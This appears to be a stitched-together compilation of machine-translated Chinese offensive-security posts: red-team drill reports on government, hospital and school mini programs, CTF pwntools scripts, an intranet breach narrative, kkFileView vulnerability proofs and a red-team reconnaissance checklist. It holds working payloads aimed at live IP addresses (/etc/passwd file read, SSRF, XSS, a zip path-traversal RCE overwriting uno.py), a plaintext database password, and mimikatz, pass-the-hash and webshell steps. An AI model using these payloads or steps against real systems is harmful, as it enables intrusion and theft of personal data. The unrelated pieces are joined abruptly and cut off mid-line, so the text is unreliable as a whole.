UKhackteam

0x00 Introduction Just ended HVV in a certain place, mini programs, as low-cost and easy-to-use information system, have become the key breakthrough target of HVV's new type. The following cases are all from mini programs for everyone to learn. 0x01 Case 1 A certain government affairs system 1. Weak password enters the background Click on the mini program, enter the citizen service, catch the mini program domain name, and directly access the administrator background. The following page is the Fastadmin framework. There has always been a pitfall. The password is invalid when logging in. When I want to give up, click to return to the previous step to remind me that you are logged in. I wondered. I found that the token will be refreshed after the system logs in, which causes the previous token to be used for the next login, otherwise the password will be invalid. Therefore, it should be that the network or system itself has delays, resulting in the login operation not being successfully used with the correct token. When I discovered this problem, I had logged into the background by admin/123456. It contains nearly 20,000 citizen information, as well as hundreds of administrator accounts, and the account names and passwords in all administrator accounts are admin/123456. It is similar to the case four system in the prefecture-level city HVV | unauthorized access to the collection. (Damn it) 2. SQL injection is everywhere The front-end business office has the following package. The debug is not closed, causing the database account name and password to be exposed. This SQL injection is too obvious, but at this time I was in the joy of the database account secrets and did not do SQL injection. However, this database is not external and can only connect locally, which is very annoying. Delay injection exists when viewing administrators in the background 3. Command execution takes down the server and database Since it is fastadmin, there are many ways to get shells. This time, I used the online command plug-in vulnerability to write to PHP Webshell, which is only available in 1.1.0. However, this system is open for two, and there is no place for plug-ins at all. I searched the splicing page for plug-ins online. The directory is: /addon?ref=addtabs The directory of the plug-in should be /addon/command?ref=addtabs, but the page does not exist. I thought the route was not set, so I banned this until my teammate found out in an article that directly commanded the plug-in, that is, the directory is /command?ref=addtabs Click to generate the API document with one click. The file is php and the title is written as a Trojan horse. Only the Ice Scorpion Horse can test it. There were similar cases before. Connecting Trojan successfully By circulating the NC in Malaysia to increase power, the shell will be rebounded to the cloud server to obtain root permissions. Malaysia will report errors and garbled codes when executing SQL statements. I still remember the database account password. I connected to the database by writing a php file of the SQL execution page by myself. Prove that I have taken the database permissions. The code is as follows: html head title executes MySQL statement/title /head Body h1Execute MySQL statement/h1 form method='POST' action='' textarea name='sql_statement' rows='5' cols='50' placeholder='Please enter MySQL statement'/textarea br input type='submit' value='execution' /form ?php //Check whether the form has been submitted if ($_SERVER['REQUEST_METHOD']==='POST') { //Get the MySQL statement entered by the user $sql_statement=$_POST['sql_statement']; //Connect to MySQL database $host='localhost'; $username=''; $password=''; $database=''; $connection=mysqli_connect($host, $username, $password, $database); //Execute MySQL query $result=mysqli_query($connection, $sql_statement); //Check the query results if ($result) { //Echo the query results echo 'h2 query result: /h2'; while ($row=mysqli_fetch_assoc($result)) { echo ''; print_r($row); echo ''; } } else { //Display error message echo 'h2 error: /h2'; echo 'p' . mysqli_error($connection) . '/p'; } //Close the database connection mysqli_close($connection); } ? /body /html 0x02 Case 2 A county hospital database 1.SQL injection takes DBA The hospital's SQL injection is in the public account registration. When I log in, I click on the registration record and caught a package with the patient ID. Added a single quote, an error order by I found that I couldn't run directly with SQLmap, but the injection does exist. Discovering the asp.net framework means that the other party's system is Windows. Specify databases MySQL, Oracle, and MSSQL respectively. Finally, the injection runs out during MSSQL and is DBA permissions. I thought that xp_cmdshell could execute commands, but unfortunately this is HIS. I have taken the protection, and I can't execute commands no matter how I set it up, so I gave up changing the target. 0x03 Case 3 Visitor system of a middle school 1. Unauthorized + Information leakage Open the mini program to catch the package and directly capture all the information of the interviewees. One interface is not authorized to access. It's like this before logging in, so it's a good idea to log in. Log in and added an access application Catch the package when viewing your access application record Grab the following link: app/visitor/getVisitorInfo?viId=1. You can get hundreds of visitor information and visitor records by traversing. It is considered to be a parallel overreach, and finally it is found that it is even unauthorized to access and has no permission to verify. 0x04 Case 4 I missed This case is quite funny. I was searching for a mini program. It popped up a small program with one word. I started typing without looking carefully. It is also a county hospital. This should be a mini program specially made for nucleic acid testing appointments during the epidemic. 1. Parallel overreach + information leakage If the ID card name does not match when logging in, it cannot pass the verification, which means that the ID card information inside is all real. Log in and you are used to looking for the function with user ID, and click on the medical visitor list to catch the packet. I found my phone, ID, name, and gender Modify the id to view other people's information, a total of more than 100,000 pieces, which is definitely parallel and overstepped. 2. Parallel overriding SQL injection Habitually adding single quotes and directly reporting an error. The page shows SQL error. Isn't this the corresponding one? The edu-SQL injection case shares the last summary. There is a high probability that SQL injection will exist in parallel overstep. But I made a mistake and didn't have authorization, so I stopped and gave up and handed over to the platform for rectification in the future. Original link: https://forum.butian.net/share/2400

1. MISC 1.sudoku_easy Simple Sudoku interaction, a few small points to pay attention to, sleep 5 seconds after each level is sent, and the question will be returned to sleep Let the shape be like -------------------------------------------------------------------------------------------------------------------------------- 800103720 023840650 410006008 300001062 000052407 072060090 160000375 205019846 000030000 -------------------------------------------------------------------------------------------------------------------------------- Convert to a two-dimensional array to solve the Sudoku and reconvert the return result to a multi-line string def parse_input(input_list): board=[] for row in input_list: nums=list(map(int, row)) board.append(nums) return board def format_output(board): formatted='' for row in board: formatted +=''.join(map(str, row)) + '\n' return formatted.strip() At first, I thought that each time I got 5 points, I had to get 120 points, and I had a range of 24 times, but I kept getting problems. Later, I found that the scores were increased. At the same time, I debugged and found that if I got 120 points, I would return a getshell, so I modified the range 7 times. Final script : def find_empty(board): for row in range(9): for col in range(9): if board[row][col]==0: return row, col return None def is_valid(board, num, pos): row, col=pos for i in range(9): if board[row][i]==num and col !=i: return False if board[i][col]==num and row !=i: return False box_row=row //3 box_col=col //3 for i in range(box_row * 3, box_row * 3 + 3): for j in range(box_col * 3, box_col * 3 + 3): if board[i][j]==num and (i, j) !=pos: return False return True def solve(board): find=find_empty(board) If not find: return True else: row, col=find for i in range(1, 10): if is_valid(board, i, (row, col)): board[row][col]=i If solve(board): return True board[row][col]=0 return False def parse_input(input_list): board=[] for row in input_list: nums=list(map(int, row)) board.append(nums) return board def format_output(board): formatted='' for row in board: formatted +=''.join(map(str, row)) + '\n' return formatted.strip() # input_string='''--------------------- # 800103720 # 023840650 # 410006008 # 300001062 # 000052407 # 072060090 # 160000375 # 205019846 # 000030000 # ---------------------- # now give me you solve:''' # lists=input_string.split('\n')[1:10] # board=parse_input(lists) # print(board) # solve(board) # print(board) from pwn import * # Create a connection conn=remote('47.108.165.60',27539) # Receive welcome message for i in range(7): msg=conn.recvuntil('Please input:').strip().decode('utf-8') print(msg) # Send selection conn.sendline('1'.encode()) # Receive next prompts msg=conn.recvuntil('Please select the level:').strip().decode('utf-8') print(msg) conn.sendline('5'.encode()) msg=conn.recvuntil('clock start').strip().decode('utf-8') print(msg) time.sleep(5) msg=conn.recvuntil('now gives me you solve:').strip().decode('utf-8') print(msg) lists=msg.split('\n')[1:10] board=parse_input(lists) solve(board) solved=format_output(board) conn.sendline(solved.encode()) conn.interactive() or from pwn import * def is_valid(board, row, col, num): # Check if the line is legal for i in range(9): if board[row][i]==num: return False # Check if the column is legal for i in range(9): if board[i][col]==num: return False # Check whether the ninth square is legal start_row=(row //3) * 3 start_col=(col //3) * 3 for i in range(3): for j in range(3): if board[start_row + i][start_col + j]==num: return False return True def solve_sudoku(board): for row in range(9): for col in range(9): if board[row][col]==0: for num in range(1, 10): if is_valid(board, row, col, num): board[row][col]=num if solve_sudoku(board): return True board[row][col]=0 # Backtracking return False # All numbers have been tried, no suitable numbers were found return True def print_sudoku(board): a='' for row in range(9): for col in range(9): a +=str(board[row][col]) a+='\n' return a.strip() context.log_level='debug' p=remote('47.108.165.60',23479) p.recv() for i in range(7): p.sendline('1') p.recvuntil('Please select the level:') p.sendline('5') a='---------------------\nnow give me you solve:' content=p.recvuntil(a).decode().split(a)[0][-130:] sudoku=content.split('---------------------')[1] sudoku=sudoku.strip() sudoku=sudoku.split('\n') tmp=[] for sudo in sudoku: a=[int(s) for s in sudo] tmp.append(a) if solve_sudoku(tmp): result=print_sudoku(tmp) log.info(result) for line in result.split('\n'): p.send(line) #content=p.recv().decode() p.interactive() A separate Sudoku decryption script: class SudoKu(): def __init__(self, sudo_ku_data): if not isinstance(sudo_ku_data, list): raise TypeError(f'sudo_ku_data params must a list, but {sudo_ku_data} is a {type(sudo_ku_data)}') if len(sudo_ku_data) !=9 or len(sudo_ku_data[0]) !=9: raise TypeError( f'sudo_ku_data params must a 9*9 list, but {sudo_ku_data} is a {len(sudo_ku_data)}*{len(sudo_ku_data[0])} list') self.sudo_ku=sudo_ku_data # Store the existing data in each row self.every_row_data={} # The existing numbers in each column self.every_column_data={} # Every 3*3 number self.every_three_to_three_data={} #Each vacant location self.vacant_position=[] # Numbers tried in each vacant position self.every_vacant_position_tried_values={} # Initialize data self._init() def _add_row_data(self, row, value): ''' When initialization Add data to self.every_row_data :param row: :param value: :return: ''' if row not in self.every_row_data: self.every_row_data[row]=set() if value in self.every_row_data[row]: raise TypeError(f'params {self.sudo_ku} is a invalid SudoKu') self.every_row_data[row].add(value) def _add_column_data(self, column, value): ''' When initialization Add data to self.every_column_data :param column: :param value: :return: ''' if column not in self.every_column_data: self.every_column_data[column]=set() if value in self.every_column_data[column]: raise TypeError(f'params {self.sudo_ku} is a invalid SudoKu') self.every_column_data[column].add(value) def _get_three_to_three_key(self, row, column): ''' Get every 3*3 key :param row: :param column: :return: ''' if row in [0, 1, 2]: if column in [0, 1, 2]: key=1 elif column in [3, 4, 5]: key=2 else: key=3 elif row in [3, 4, 5]: if column in [0, 1, 2]: key=4 elif column in [3, 4, 5]: key=5 else: key=6 else: if column in [0, 1, 2]: key=7 elif column in [3, 4, 5]: key=8 else: key=9 return key def _add_three_to_three_data(self, row, column, value): ''' When initialization Add data to self.every_three_to_three_data :param row: :param column: :param value: :return: ''' key=self._get_three_to_three_key(row, column) if key not in self.every_three_to_three_data: self.every_three_to_three_data[key]=set() self.every_three_to_three_data[key].add(value) def _init(self): ''' Initialize data based on the incoming Sudoku :return: ''' for row, row_datas in enumerate(self.sudo_ku): for column, value in enumerate(row_datas): if value=='': self.vacant_position.append((row, column)) else: self._add_row_data(row, value) self._add_column_data(column, value) self._add_three_to_three_data(row, column, value) def _judge_value_is_legal(self, row, column, value): ''' Determine whether the data placed by the party is legal :param row: :param column: :param value: :return: ''' # Does the value exist in this row of data if value in self.every_row_data[row]: return False # Does the value exist in this column of data if value in self.every_column_data[column]: return False # value does this 3*3 palace exist? key=self._get_three_to_three_key(row, column) If value in self.every_three_to_three_data[key]: return False return True def _calculate(self, vacant_position): ''' Calculate, start placing the value on the Sudoku :param vacant_position: :return: ''' # Get the current location row, column=vacant_position values=set(range(1, 10)) # Create a unique key for the current location to store the data that has been tried in the current location key=str(row) + str(column) # If this key exists, get the difference set of values, because both are sets, just use them directly - if key in self.every_vacant_position_tried_values: values=values - self.every_vacant_position_tried_values[key] # If this key does not exist, create an empty collection else: self.every_vacant_position_tried_values[key]=set() for value in values: # Add the current data to the data that has been tried at the current location self.every_vacant_position_tried_values[key].add(value) # If the current value is legal, it can be placed if self._judge_value_is_legal(row, column, value): # print(f'set {vacant_position} value is {value}')

Re Emoji Connect is an Excel plug-in. After starting to play, a 4848 matrix will be initialized. Each grid has an emoji, and then two grids will be clicked each time. If the emoji in the two grids is the same, these two grids will be eliminated. At first I thought it was the elimination of three grids such as stars, but looking at the logic of the game only replaced two at a time, so I did look at it one after another. Then the logic of flag is to subtract the rows of grids every time it is eliminated. The subscript is transferred from unicode using a magical method. I directly use the minimum value of emoji in the matrix to make the subscript offset. dat='''

Foreword Some time ago, I participated in an offensive and defensive drill. After using conventional vulnerabilities, I thought that many masters had shared articles looking for breakthroughs in JS, so I just started JS and finally opened the intranet entrance to obtain target permissions and personal information. Let’s share the process here. Statement: In this drill, all test equipment is provided by the organizer, all traffic is archived for audit, all operations are completed under authorization, and all data has been safely destroyed after the end. Doing through JS There is only one login page at the beginning, the username cannot be enumerated and the attempt to explode failed. Use bp to catch packets to view JS-related files and find that there are SQL statements Tracking comboxSQL variables, and discovering that an action class is defined Search for this action classpath and find that the access method is through url stitching. The path is spliced and the parameters are entered into the SQL statement. The test found that the database is an mssql database. System commands can be executed through xp_cmdshell. shellcodeloader is available online CS After executing the system permission, I planned to use remote download to go online without killing the cs, but it was not successfully launched. I found that there was 360 Enterprise Cloud, which triggered the intercept of the execution of the exe. Change your thinking. After downloading Godzilla webshell, use Godzilla's shellcodeloader function to load your own CS Trojan shellcode to successfully go online. Decrypt database configuration information Because when exe files are executed, access is denied and the file cannot be run. By searching for the local configuration file, the database account password was found, but the database password was encrypted. By searching for historical website backup files, the system's early configuration files were not configured for database password encryption, and the test found that it was possible to connect to the database. When looking up the database backup file of this system, I accidentally discovered another business system deployed by the server, and the account number, password and database ip in the database configuration file are also encrypted storage. By finding the system characteristics, it is discovered as a SiteServer CMS system. I found the SiteServer CLI, a dedicated encryption and decryption tool for this cms, from searching online. After running , you can also obtain the database plaintext configuration information Server=x.x.x.x;Uid=sa;Pwd=xxCSthink!@#123;Database=NEWdfgxxcs enables the proxy to connect, and the test connection is successful However, it was also found that the database server could not execute the exe program, could not run mimikatz to read the administrator hash, could not create a user, could not upload tscan for intranet scanning, so I was so embarrassed to stay here. Finally, use the information detection of the CSS plug-in to detect intranet segment assets. Using 17010 plugin attack failed Use proxychains to cooperate with msf to obtain PC permissions Use mimikaz to read the administrator password to enable remote desktop and find that it is impossible to log in. msf loading mimikaz module privilege:debug ts:multirdp Get the intranet permissions Create a new user and enter your personal PC computer Through this PC as a base, upload TideFinger and Tscan to perform intranet scanning. It is necessary to introduce these two tools here. The TideFinger fingerprint recognition function of Go language version: 1. Added Dismap, Vscan, Kscan, fofa, ServerScan and other fingerprints 2. Added ServerScan's non-web service fingerprint to optimize the coroutine concurrency efficiency of asset discovery. 3. The display effect is borrowed from Dismap, and it should be currently higher in terms of efficiency and fingerprint coverage. Tscan functions of Go language version: 1. Tscan is an internal and external network asset scanning tool jointly maintained by the Tide security team. 2. The basic code is iterated with the update of Fscan 3. Linked with the Chaosheng POC vulnerability detection platform, team members will write the recent pocs that have been exposed every month and regularly collect and organize the published pocs on the Internet and finally update and release them. After scanning the intranet network segment, the next step is the vulnerability verification process. I glanced at it and found no holes that could getshell directly. However, the fingerprint detected that one of the intranet IPs opened with port 2222 as rmi. Although the server has obtained permission, no other relevant account password information was found when collecting information on this server. SAM file get user hash Use the sekurlsa:logonpasswords command in mimikaz to try to read the information of the process lsas to obtain the password information of the currently logged in user. The output result shows that there is no user information such as administrator (mainly because when using the permission to use Cs, it is estimated that the soft-killing strategy was triggered, causing the server to restart). Then, using query user, I found that the administrator user is not online, so I cannot directly read the administrator hash through memory. Use mimikaz to read hash in SAM file. #Elevate permissions privilege:debug #Elevate to system token:elevate #Crawl sam lsadump:sam hash delivery After getting the NTLM Hash, I found that I could not directly decrypt the plain text password from the online website. The obtained NTLM hash is passed through the hash to obtain the permissions of the four servers. Next, use hash to log in to the server and continue to collect information. A remote desktop of the nesting doll was found in one of the servers, and it was for the 03 system Rules for obtaining server password Read this password through mimikaz (before KB2871997, Mimikatz could directly grab the plaintext password) *Username:Administrator *Domain:WIN-LAOLOVGMF *Password:

0x00 There is arbitrary file reading vulnerability in kkFileview Vulnerability Description Keking KkFileview is a Spring-Boot online preview project for creating file documents in China. Keking kkFileview has a security vulnerability that originates from the existence of reading arbitrary files through a directory traversal vulnerability, which may cause sensitive files to leak on the relevant host. Vulnerability affects kkFileview=3.6.0 fofa query body='kkFile:View' Proof of vulnerability http://103.39.221.102:8012//getCorsFile?urlPath=file:///etc/passwd 0x01 kkFileView SSR vulnerability Vulnerability Description There is an SSRF vulnerability in kkFileview v4.1.0. Attackers can exploit this vulnerability to cause server-side request forgery (SSRF). Remote attackers can force the application to issue any request by injecting any URL into the URL parameters. Vulnerability affects kkFileview=v4.1.0 Proof of vulnerability http://121.40.238.48:8012//getCorsFile?urlPath=aHR0cDovL2QyYjY0NWQ3LmRucy5kbnNtYXAub3Jn 0x03 kkFileView XSS vulnerability Vulnerability Description kkFileview v4.1.0 has two XSS vulnerabilities, which may lead to the leak of website cookies. Vulnerability affects kkFileview=v4.1.0 Vulnerability Proof http://www.baidu.com/test.txt'img src=111 oneerror=alert(1) Encoding base64: aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg== url encoding: aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg%3D%3D poc1: /onlinePreview?url=%3Cimg%20src=x%20onerror=alert(0)%3E /picturesPreview?urls=aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg%3D%3D http://139.9.164.127:8012/onlinePreview?url=%3Cimg%20src=x%20onerror=alert(0)%3E http://119.91.146.127:8012/picturesPreview?urls=aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg%3D%3D svg/onload=alert(1) encoding base64: PHN2Zy9vbmxvYWQ9YWxlcnQoMSk+ url encoding: PHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B poc2: /picturesPreview?urls=currentUrl=PHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B http://119.91.146.127:8012/picturesPreview?urls=currentUrl=PHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B 0x04 kkFileView upload any file, resulting in xss and file inclusion vulnerabilities Vulnerability Description There is a file resolution vulnerability in the entire version of kkFileview. Attackers can use this vulnerability to create storage XSS, file inclusion or SSRF. Remote attackers can persistently use the application to issue attack requests by uploading any JavaSript script to the server. Vulnerability affects kkFileView=4.1.0 Vulnerability Proof 1. Upload file 2. Access vulnerability location http://139.9.101.60:8012/demo/2.html 2. The file contains: https://file.keking.cn/demo/test1.js access: https://file.keking.cn/demo/test14.html 0x05 kkFileView arbitrary file deletion vulnerability Vulnerability Description kkFileview v4.0.0 has arbitrary file deletion vulnerability, which may cause any file in the system to be deleted Vulnerability Impact kkFileview=v4.0.0 Vulnerability Proof /deleteFile?fileName=demo%2F.\xss.pdf Get request to this uri will delete xss.pdf in the \kkFileView-master\server\src\main\file directory (originally, the files under the \kkFileView-master\server\src\main\file\demo directory) 0x06 kFileView-v4.3.0~v4.40-beta RCE vulnerability Vulnerability impact: v4.2.1 and v4.2.0 are both impacts, 4.1.0 is not affected Upload any file import zipfile if __name__=='__main__': try: binary1=b'1ueeeeeee' binary2=b'hacked_by_1ue' zipFile=zipfile.ZipFile('hack.zip', 'a', zipfile.ZIP_DEFLATED) info=zipfile.ZipInfo('hack.zip') zipFile.writestr('test', binary1) zipFile.writestr('././././././././././././././././././././././././tmp/flag', binary2) zipFile.close() except IOError as e: raise e Make malicious hack.zip, note that there must be a normal file, such as test, to facilitate the creation of hack.zip_cache file Upload files and preview Discover successful travel RCE You can upload any file, and you can append the file contents After my research, I found that the target will call the system's Libreoffice when using odt to pdf, and this process will call the uno.py file in the library, so the content of the py file can be overwritten. import zipfile if __name__=='__main__': try: binary1=b'1ue' binary2=b'import os\r\nos.system(\'touch /tmp/hack_by_1ue\')' zipFile=zipfile.ZipFile('hack.zip', 'a', zipfile.ZIP_DEFLATED) info=zipfile.ZipInfo('hack.zip') zipFile.writestr('test', binary1) zipFile.writestr('././././././././././././././././././././././././opt/libreoffice7.5/program/uno.py', binary2) zipFile.close() except IOError as e: raise e Malicious zip packages Upload and preview Then upload an odt file and initiate a libreoffice task to upload and preview You can see that the command was executed successfully The content is indeed written in uno.py

Brief description of daily procedures Entry permission=Intranet collection/detection=Exemption of killing [not required]=Crawl login credentials=Cross-platform horizontal=Entry maintenance=Data return=Regular permission maintenance 0x01 Access to the entry permission [In the early reconnaissance, there are not many defensible points in the collection stage, and they are not the center of defense] 1. Find all the real IP segments around the CDN (1). Through multiple PINGs across the country, check whether the IP address is unique to determine whether CDNhttp://ping.chinaz.com/https://tools.ipip.net/ping.phphttps://www.17ce.com/https://www.cdnplanet.com/tools/cdnfinder/(2). Through the previous DNS binding history Record to find the real IP address https://x.threatbook.cn/https://viewdns.info/https://www.ip138.com/http://toolbar.netcraft.com/site_report?url=https://securitytrails.com/(3). By obtaining multiple subdomains and pinging multiple subdomains in batches, you can determine the IP of the subdomain The segment is the real IP segment (the main site uses CND, while the subdomain sub-site does not use Cdn to resolve) Layer subdomain excavator/GoogleHackinghttps://phpinfo.me/domain/http://tool.chinaz.com/subdomain/https://github.com/lijiejie/subDomainsBrute(4). Use SSL certificate to find the real original IPhttps://c ensys.io/https://crt.sh/(5). Use foreign host to resolve domain name https://asm.ca.com/zh_cn/ping.phphttps://asm.saas.broadcom.com/zh_cn/register.phphttps://dnscheck.pingdom.com(6). Website vulnerability search such as phpinfo or github sensitive information leakage or Apache status and Jboss status sensitive information leakage, web source code leakage, svn information leakage letter, github information leakage (7). Website email subscriptions look for RSS email subscriptions. Many websites come with sendmail and will send us an email. At this time, checking the email source code will contain the server's real IP. (8). Invade CDN and enter through loopholes or weak social workers' passwords. (9). Obtain the real IP through ZMAP and Zgrab's full network scanning: https://www.ip2location.com/free/visitor-blockerhttps://www.ipdeny.com/ipblocks/https://www.t00ls.net/articles-40631.html(Zgrab)https://levyhsu.com/2017/05/%e5%88%a9%e7% 94%a8zgrab%e7%bb%95cdn%e6%89%be%e7%9c%9f%e5%ae%9eip/http://bobao.360.cn/learning/detail/211.html(ZMAP)(10).Cyberspace security engine search Zhong Kui's Eye: https://www.zoomeye.orgShodan: https://www.shodan.ioFofa: https://fofa.s(11).Fantasy ping such as ping www.163.com. If ping 163.con, it can bypass (12). The old domain name of the previous one can be pinged (13). F5 LTM decoding method When the server uses F5 LTM for load balancing, the real IP can also be obtained by decoding the set-cookie keyword, for example: Set-Cookie: BIGipServerpool_8.29_8030=487098378.24095.0000. First take out the decimal number of the first section, namely 487098378, then convert it into hexadecimal number 1d08880a, then from the back to the front, take the four-digit number, that is, 0a.88.08.1d, and finally convert them into decimal number 10.136.8.29 in turn, which is the last real ip2. Various web management backend login ports for finding the target (1) Bulk crawl all real C segments of the target Web banner tool: iisput (2). Batch basic service port scanning, detection and identification tools for all real C segments of the target: Yujian Port Scan, Goby (3). Try whether the target DNS allows the area transmission. If it is not allowed, continue to try to blast the subdomain DNS domain transmission: C:\Users\ljnslookup default server : UnKnownAddress: 211.82.100.1 server dns1.thnu.edu.cn default server : dns1.thnu.edu.cnAddress: 125.223.168.5 ls thnu.edu.cn subdomain name explosion: Layer(4). Bulk crawl all target subdomains Web banner tool: Layer (5), batch basic service port detection and identification tool for all subdomains of the target: Yujian port scan, Goby (6) batch identify the web program fingerprint of all surviving Web sites and its detailed version https://github.com/EdgeSecurityTeam/EHolehttps://github.com/zhzyker/vulmap http://finger.tidesec.com/http://whatweb.bugscaner.com/look/https://fp.shuziguanxing.com/#/https://www.yunsee.cn/(6) Find various sensitive files and account passwords leaked by the target from Git, and occasionally you can even encounter various clouds accidentally leaked by the target. 'AccessKey'https://github.com/0xbug/Hawkeyehttps://github.com/FeeiCN/GSIL (6) Find various sensitive files and account passwords leaked by the target from the network disk/Baidu Library http://www.daysou.com/(Network disk search) (7) Find various sensitive account passwords that the target has leaked from the third-party historical vulnerability database [Domestic targets are very useful] https://www.madebug.net/(8) Various sensitive file tools leaked in the target Svn: Seay SVN vulnerability exploit tool (9) Website directory scan [Find all kinds of sensitive files leaked by the target website, website backup files, sensitive configuration files, source code, other people's webshells, etc.] Tools: Yujian Directory, dirsearchhttps://github.com/foryujian/yjdirscanhttps://github.com/maurosoria/dirsearch (10) Various sensitive information leaked by the target site itself in the front-end code (11)fofa/shodan/bing/google hacking In-depth utilization (12) Collect target student number/employee work number/target email [and go to various social work databases to batch check whether these email addresses have leaked passwords] Student student number official website and Tieba forum collect, employee work number search on the official website or social work database and github (13) The target provides various technical documents/wikis and various account passwords and other sensitive information. (14) Target WeChat applet and public account (15) Analyze target app Web requests (16) Use js probe to collect target intranet information (17) Find ways to mix in various internal QQ groups/WeChat groups (18) Analyze target direct suppliers [especially technology outsourcing] (19) Create a targeted weak password dictionary based on various information collected earlier https://xsshs.cn/xss.php?do=pass (20) Waf type recognition used by the target and bypass https://github.com/EnableSecurity/wafw00f (waf recognition) (21) BypassWAF file upload/read/download (22) BypassWAF Sql injection (23) BypassWAF RCE (24) BypassWAF Various types of Java Web middleware known Nday vulnerabilities (25) BypassWAF Webshell Free from killing More, please add and correct. 0x02 Access to the entry permission [External Defense Center ("Focus on Top")] This stage is mainly aimed at the mainstream 'middleware + open source programs + web service components' various known Nday vulnerabilities The following has been sorted in detail based on the 'difficulty of actual attack utilization' and 'high and low shell permissions obtained' as the standards. Since it is completely guided by practical use Therefore, I only selected some 'middleware', 'open source programs' and 'web components' that are relatively common and can effectively assist in gettingshell in practice. A variety of known Nday exploits for various Java middleware Unlike other script-like web programs, Java's running permissions are usually relatively high, and most of them are directly running with root/administrator/system permissions. Therefore, the shell permissions obtained are generally very high, and they are usually directly server permissions Especially in various red team scenarios, intruders generally choose these points first and use this as a breakthrough to obtain a stable springboard entry permission. Regarding which industries particularly like to use which middleware, these should also be analyzed and summarized in advance. Struts2Struts2-005 Struts2-008 Struts2-009 Struts2-013 Struts2-016 (In fact, many old systems have missed this hole, and the success rate is high) Struts2-019 Struts2-020 Struts2-devmode Struts2-032 Struts2-033 Struts2-037 Struts2-045 Struts2-046 Struts2-048 Struts2-052 Struts2-053 Struts2-057 Utilization tool: https://github.com/HatBoy/Struts2-ScanweblogicCVE-2019-2725 CVE-2019-2729 CVE-2018-3191 CVE-2018-2628 CVE-2018-2893 CVE-2018-2894 CVE-2017-3506 CVE-2017-10271 CVE-2017-3248 CVE-2016-0638 CVE-2016-3510 CVE-2015-4852 CVE-2014-4210 SSRF Weak console password, deploy webshell Tool checking and exploitation: https://github.com/0xn0ne/weblogicScanner (tool checking) https://github.com/zhzyker/expub/tree/master/weblogic (tool exploitation) JbossCVE-2015-7501 CVE-2017-7504 CVE-2017-12149 Unauthorized access, deploy webshell Weak console password, deploy webshell Utilization tool: https://github.com/joaomatosf/jexbosshttps://github.com/joaomatosf/JavaDeserH2HCwildfly [jboss 7.x is renamed wildfly] console weak password, deploy webshell TomcatCVE-2016-8735 CVE-2017-12615 [ readonly, it is less likely to be set to true, and it is a little useless] CVE-2020-1938 [AJP protocol vulnerability, not many people directly expose port 8009 to the external network, which is a bit useless] Weak password on the console, webshelll is deployed [Note : version 7.x, an explosion-proof mechanism is added by default] Vulnerability exploit summary: https://blog.csdn.net/weixin_42918771/article/details/104844367https://mp.weixin.qq.com/s/ZXoCJ9GhMaTvVFeYn8vMUAhttps://saucer-man.com/information_security/507.html#cl-11 JekinsCVE-2018-1999002 [Arbitrary file reading] Unauthorized access, arbitrary command execution Weak password on the console, any command execution Vulnerability exploit summary: https://www.cnblogs.com/junsec/p/11593556.htmlhttps://misakikata.github.io/2020/03/Jenkins%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88%E5%A4%8D%E7%8E%B0/https://github.com/gquere/pwn_jenkins ElasticSearchCVE-2014-3120 [Specially for old versions (no sandbox) RCE] CVE-2015-1427 [Groovy RCE] CVE-2015-3337 [Arbitrary file reading] Unauthorized access, sensitive information leaked Vulnerability summary: https://jishuin.proginn.com/p/763bfbd3aa0dhttps://mp.weixin.qq.com/s?__biz=MzAwMjgwMTU1Mg==mid=2247484799idx=2sn=b91f5bc7a31f5786a66f39599ea44bffhttps://blog.csdn.net/u011066706/article/details/51175761 https://www.cnblogs.com/AtesetEnginner/p/12060537.html The default account password of RabbitMQ weak password is guest/guest (default port: 15672, 25672, 15692) Glassfish arbitrary file reading [low version] Weak console password, deploy webshell Vulnerability exploit: http://ip:port/theme/META-INF/%c0.%co./%c0.%co./%c0.%co./%c0.%co./%c0.%co./%c0.%co./xxxpath/xxxfilehttps://www.lxhsec.com/2019/03/04/middleware/IBM WebsphereJava Deserialization Weak console password, deploy webshell Vulnerability exploithttps://www.lxhsec.com/2019/03/04/middleware/https://wiki.96.mk/Web%E5%AE%89%E5%85%A8/WebSphere/CVE-2020-4643%20IBM%20WebSphere%E5%AD%98%E5 %9C%A8XXE%E5%A4%96%E9%83%A8%E5%AE%9E%E4%BD%93%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/https://github.com/Ares-X/VulWikihttps://xz.aliyun.com/t/8248 Axis2 arbitrary file reading Directory traversal Vulnerability exploit: https://xz.aliyun.com/t/6196https://paper.seebug.org/1489/#23-axis2https://wiki.96.mk/Web%E5%AE%89%E5%85%A8/Apache%20Axis/%EF%BC%88CVE-2019-0227%EF%BC%89Apache%20Axis %201.4%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/https://github.com/CaledoniaProject/AxisInvokerhttps://github.com/Fnzer0/Axis-RCEhttps://paper.seebug.org/1489/Apache ActiveMQ is not authorized to access, and the fileserver before 5.12 exists and PUT is written arbitrarily CVE-2015-5254 Vulnerability exploit: http://wiki.sentrylab.cn/0day/ActiveMQ/3.htmlhttps://www.freebuf.com/column/161188.htmlhttps://www.taodudu.cc/news/show-2345492.html Apache SolrCVE-2017-12629 CVE-2019-0193 [Apache Solr 5.x - 8.2.0] Exploit: https://xz.aliyun.com/search?keyword=Solrhttps://www.jianshu.com/p/43e7f13e2058https://caiqiqi.github.io/2019/11/03/Apache-Solr%E6%BC%8F%E6%B4%9E%E5%90%88%E9%9B%86/https://cloud.tencent.com/developer/article/1810723 http://wiki.peiqi.tech/PeiQi_Wiki/Web%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%BC%8F%E6%B4%9E/Apache/Apache%20Solr/?h=Apache%20Solr Apache Zookeeper is not authorized to access, sensitive information is leaked Apache Shiro deserialization fastjson=1.2.47 Deserialization utilization For various Windows php integrated environments [Because the Webshell permissions obtained by such environments are relatively high, it is 